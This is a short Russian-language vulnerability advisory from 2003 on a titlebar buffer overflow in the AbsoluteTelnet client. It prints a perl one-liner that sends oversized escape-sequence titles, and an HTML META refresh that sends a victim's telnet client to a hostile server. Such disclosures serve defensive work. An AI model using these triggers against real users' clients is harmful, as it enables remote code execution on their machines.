Дата публикации: | 10.02.2003 |
Всего просмотров: | 1100 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Переполнение буфера обнаружено в AbsoluteTelnet. Удаленный атакующий может выполнить произвольный код с пользовательскими привилегиями. Переполнение обнаружено в функции titlebar. Пример: export KNUD=`perl -e 'print "A" x 174'` echo -ne "\033]0;$KNUD\007" export KNUD=`perl -e 'print "A" x 296'` echo -ne "\033]0;$KNUD\007" <pre> Если AbsoluteTelnet клиент конфигурирован как telnet клиент по умолчанию, то уязвимость может использоваться через специально сформированную Web страницу. Пример: <pre> <META HTTP-EQUIV="Refresh" CONTENT="0;URL=telnet://hostile.serv.er">Уязвимость обнаружена в AbsoluteTelnet 2.00, 2.11 и устранена в 2.12 RC10 |
Ссылки: | AbsoluteTelnet 2.00 buffer overflow. |